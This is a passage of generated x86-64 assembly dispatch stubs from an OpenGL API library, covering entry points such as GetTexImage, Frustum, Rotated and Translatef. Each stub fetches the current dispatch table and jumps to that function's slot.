.size GL_PREFIX(GetPixelMapfv), .-GL_PREFIX(GetPixelMapfv)
.p2align 4,,15
.globl GL_PREFIX(GetPixelMapuiv)
.type GL_PREFIX(GetPixelMapuiv), @function
GL_PREFIX(GetPixelMapuiv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2176(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 2176(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2176(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 2176(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetPixelMapuiv), .-GL_PREFIX(GetPixelMapuiv)
.p2align 4,,15
.globl GL_PREFIX(GetPixelMapusv)
.type GL_PREFIX(GetPixelMapusv), @function
GL_PREFIX(GetPixelMapusv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2184(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 2184(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2184(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 2184(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetPixelMapusv), .-GL_PREFIX(GetPixelMapusv)
.p2align 4,,15
.globl GL_PREFIX(GetPolygonStipple)
.type GL_PREFIX(GetPolygonStipple), @function
GL_PREFIX(GetPolygonStipple):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2192(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 2192(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2192(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 2192(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetPolygonStipple), .-GL_PREFIX(GetPolygonStipple)
.p2align 4,,15
.globl GL_PREFIX(GetString)
.type GL_PREFIX(GetString), @function
GL_PREFIX(GetString):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2200(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 2200(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2200(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 2200(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetString), .-GL_PREFIX(GetString)
.p2align 4,,15
.globl GL_PREFIX(GetTexEnvfv)
.type GL_PREFIX(GetTexEnvfv), @function
GL_PREFIX(GetTexEnvfv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2208(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2208(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2208(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2208(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetTexEnvfv), .-GL_PREFIX(GetTexEnvfv)
.p2align 4,,15
.globl GL_PREFIX(GetTexEnviv)
.type GL_PREFIX(GetTexEnviv), @function
GL_PREFIX(GetTexEnviv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2216(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2216(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2216(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2216(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetTexEnviv), .-GL_PREFIX(GetTexEnviv)
.p2align 4,,15
.globl GL_PREFIX(GetTexGendv)
.type GL_PREFIX(GetTexGendv), @function
GL_PREFIX(GetTexGendv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2224(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2224(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2224(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2224(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetTexGendv), .-GL_PREFIX(GetTexGendv)
.p2align 4,,15
.globl GL_PREFIX(GetTexGenfv)
.type GL_PREFIX(GetTexGenfv), @function
GL_PREFIX(GetTexGenfv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2232(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2232(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2232(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2232(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetTexGenfv), .-GL_PREFIX(GetTexGenfv)
.p2align 4,,15
.globl GL_PREFIX(GetTexGeniv)
.type GL_PREFIX(GetTexGeniv), @function
GL_PREFIX(GetTexGeniv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2240(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2240(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2240(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2240(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetTexGeniv), .-GL_PREFIX(GetTexGeniv)
.p2align 4,,15
.globl GL_PREFIX(GetTexImage)
.type GL_PREFIX(GetTexImage), @function
GL_PREFIX(GetTexImage):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2248(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _x86_64_get_dispatch@PLT
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2248(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2248(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _glapi_get_dispatch
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2248(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetTexImage), .-GL_PREFIX(GetTexImage)
.p2align 4,,15
.globl GL_PREFIX(GetTexParameterfv)
.type GL_PREFIX(GetTexParameterfv), @function
GL_PREFIX(GetTexParameterfv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2256(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2256(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2256(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2256(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetTexParameterfv), .-GL_PREFIX(GetTexParameterfv)
.p2align 4,,15
.globl GL_PREFIX(GetTexParameteriv)
.type GL_PREFIX(GetTexParameteriv), @function
GL_PREFIX(GetTexParameteriv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2264(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2264(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2264(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2264(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetTexParameteriv), .-GL_PREFIX(GetTexParameteriv)
.p2align 4,,15
.globl GL_PREFIX(GetTexLevelParameterfv)
.type GL_PREFIX(GetTexLevelParameterfv), @function
GL_PREFIX(GetTexLevelParameterfv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2272(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2272(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2272(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2272(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetTexLevelParameterfv), .-GL_PREFIX(GetTexLevelParameterfv)
.p2align 4,,15
.globl GL_PREFIX(GetTexLevelParameteriv)
.type GL_PREFIX(GetTexLevelParameteriv), @function
GL_PREFIX(GetTexLevelParameteriv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2280(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2280(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2280(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2280(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetTexLevelParameteriv), .-GL_PREFIX(GetTexLevelParameteriv)
.p2align 4,,15
.globl GL_PREFIX(IsEnabled)
.type GL_PREFIX(IsEnabled), @function
GL_PREFIX(IsEnabled):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2288(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 2288(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2288(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 2288(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(IsEnabled), .-GL_PREFIX(IsEnabled)
.p2align 4,,15
.globl GL_PREFIX(IsList)
.type GL_PREFIX(IsList), @function
GL_PREFIX(IsList):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2296(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 2296(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2296(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 2296(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(IsList), .-GL_PREFIX(IsList)
.p2align 4,,15
.globl GL_PREFIX(DepthRange)
.type GL_PREFIX(DepthRange), @function
GL_PREFIX(DepthRange):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2304(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 2304(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2304(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 2304(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(DepthRange), .-GL_PREFIX(DepthRange)
.p2align 4,,15
.globl GL_PREFIX(Frustum)
.type GL_PREFIX(Frustum), @function
GL_PREFIX(Frustum):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2312(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $56, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
movq %xmm4, 32(%rsp)
movq %xmm5, 40(%rsp)
call _x86_64_get_dispatch@PLT
movq 40(%rsp), %xmm5
movq 32(%rsp), %xmm4
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $56, %rsp
movq 2312(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2312(%rax), %r11
jmp *%r11
1:
subq $56, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
movq %xmm4, 32(%rsp)
movq %xmm5, 40(%rsp)
call _glapi_get_dispatch
movq 40(%rsp), %xmm5
movq 32(%rsp), %xmm4
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $56, %rsp
movq 2312(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Frustum), .-GL_PREFIX(Frustum)
.p2align 4,,15
.globl GL_PREFIX(LoadIdentity)
.type GL_PREFIX(LoadIdentity), @function
GL_PREFIX(LoadIdentity):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2320(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
movq 2320(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2320(%rax), %r11
jmp *%r11
1:
pushq %rbp
call _glapi_get_dispatch
popq %rbp
movq 2320(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(LoadIdentity), .-GL_PREFIX(LoadIdentity)
.p2align 4,,15
.globl GL_PREFIX(LoadMatrixf)
.type GL_PREFIX(LoadMatrixf), @function
GL_PREFIX(LoadMatrixf):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2328(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 2328(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2328(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 2328(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(LoadMatrixf), .-GL_PREFIX(LoadMatrixf)
.p2align 4,,15
.globl GL_PREFIX(LoadMatrixd)
.type GL_PREFIX(LoadMatrixd), @function
GL_PREFIX(LoadMatrixd):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2336(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 2336(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2336(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 2336(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(LoadMatrixd), .-GL_PREFIX(LoadMatrixd)
.p2align 4,,15
.globl GL_PREFIX(MatrixMode)
.type GL_PREFIX(MatrixMode), @function
GL_PREFIX(MatrixMode):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2344(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 2344(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2344(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 2344(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MatrixMode), .-GL_PREFIX(MatrixMode)
.p2align 4,,15
.globl GL_PREFIX(MultMatrixf)
.type GL_PREFIX(MultMatrixf), @function
GL_PREFIX(MultMatrixf):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2352(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 2352(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2352(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 2352(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MultMatrixf), .-GL_PREFIX(MultMatrixf)
.p2align 4,,15
.globl GL_PREFIX(MultMatrixd)
.type GL_PREFIX(MultMatrixd), @function
GL_PREFIX(MultMatrixd):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2360(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 2360(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2360(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 2360(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MultMatrixd), .-GL_PREFIX(MultMatrixd)
.p2align 4,,15
.globl GL_PREFIX(Ortho)
.type GL_PREFIX(Ortho), @function
GL_PREFIX(Ortho):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2368(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $56, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
movq %xmm4, 32(%rsp)
movq %xmm5, 40(%rsp)
call _x86_64_get_dispatch@PLT
movq 40(%rsp), %xmm5
movq 32(%rsp), %xmm4
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $56, %rsp
movq 2368(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2368(%rax), %r11
jmp *%r11
1:
subq $56, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
movq %xmm4, 32(%rsp)
movq %xmm5, 40(%rsp)
call _glapi_get_dispatch
movq 40(%rsp), %xmm5
movq 32(%rsp), %xmm4
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $56, %rsp
movq 2368(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Ortho), .-GL_PREFIX(Ortho)
.p2align 4,,15
.globl GL_PREFIX(PopMatrix)
.type GL_PREFIX(PopMatrix), @function
GL_PREFIX(PopMatrix):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2376(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
movq 2376(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2376(%rax), %r11
jmp *%r11
1:
pushq %rbp
call _glapi_get_dispatch
popq %rbp
movq 2376(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PopMatrix), .-GL_PREFIX(PopMatrix)
.p2align 4,,15
.globl GL_PREFIX(PushMatrix)
.type GL_PREFIX(PushMatrix), @function
GL_PREFIX(PushMatrix):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2384(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
movq 2384(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2384(%rax), %r11
jmp *%r11
1:
pushq %rbp
call _glapi_get_dispatch
popq %rbp
movq 2384(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PushMatrix), .-GL_PREFIX(PushMatrix)
.p2align 4,,15
.globl GL_PREFIX(Rotated)
.type GL_PREFIX(Rotated), @function
GL_PREFIX(Rotated):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2392(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _x86_64_get_dispatch@PLT
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 2392(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2392(%rax), %r11
jmp *%r11
1:
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _glapi_get_dispatch
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 2392(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Rotated), .-GL_PREFIX(Rotated)
.p2align 4,,15
.globl GL_PREFIX(Rotatef)
.type GL_PREFIX(Rotatef), @function
GL_PREFIX(Rotatef):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2400(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _x86_64_get_dispatch@PLT
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 2400(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2400(%rax), %r11
jmp *%r11
1:
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _glapi_get_dispatch
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 2400(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Rotatef), .-GL_PREFIX(Rotatef)
.p2align 4,,15
.globl GL_PREFIX(Scaled)
.type GL_PREFIX(Scaled), @function
GL_PREFIX(Scaled):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2408(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 2408(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2408(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 2408(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Scaled), .-GL_PREFIX(Scaled)
.p2align 4,,15
.globl GL_PREFIX(Scalef)
.type GL_PREFIX(Scalef), @function
GL_PREFIX(Scalef):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2416(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 2416(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2416(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 2416(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Scalef), .-GL_PREFIX(Scalef)
.p2align 4,,15
.globl GL_PREFIX(Translated)
.type GL_PREFIX(Translated), @function
GL_PREFIX(Translated):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2424(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 2424(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2424(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 2424(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Translated), .-GL_PREFIX(Translated)
.p2align 4,,15
.globl GL_PREFIX(Translatef)
.type GL_PREFIX(Translatef), @function
GL_PREFIX(Translatef):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2432(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm2
